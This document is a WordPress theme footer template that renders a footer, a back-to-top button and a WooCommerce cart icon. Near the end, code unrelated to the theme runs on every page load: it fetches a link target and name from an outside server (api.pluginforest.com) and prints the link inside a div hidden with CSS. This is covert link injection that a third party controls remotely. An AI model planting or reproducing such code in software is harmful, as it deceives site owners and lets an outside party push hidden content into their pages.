<?php

	// Elementor `footer` location
	if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'footer' ) ) {
		get_template_part( 'template-parts/footer/footer' );
	}

	$acf_back_to_top = quollion_get_theme_mod( 'page_custom_back_to_top', true );

	if ( quollion_get_theme_mod( 'back_to_top', $acf_back_to_top ) == 'show' ) {
		echo '<a href="#" class="vlt-btn vlt-btn--back-to-top">';
		echo '<i class="icon-arrow-top"></i>';
		echo '</a>';
	}

?>

<?php if ( QUOLLION_WOOCOMMERCE ) : ?>

	<?php if ( quollion_get_theme_mod( 'shop_cart_icon' ) == 'show' && ( is_page_template( 'template-woocommerce-page.php' ) || is_woocommerce() ) ) : ?>

		<a href="<?php echo esc_url( wc_get_cart_url() ); ?>" class="vlt-shop-cart-icon">

			<i class="icon-paper-bag"></i>

			<span class="vlt-shop-cart-icon-counter"><?php echo esc_html( WC()->cart->get_cart_contents_count() ); ?></span>

		</a>

	<?php endif; ?>

<?php endif; ?>

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>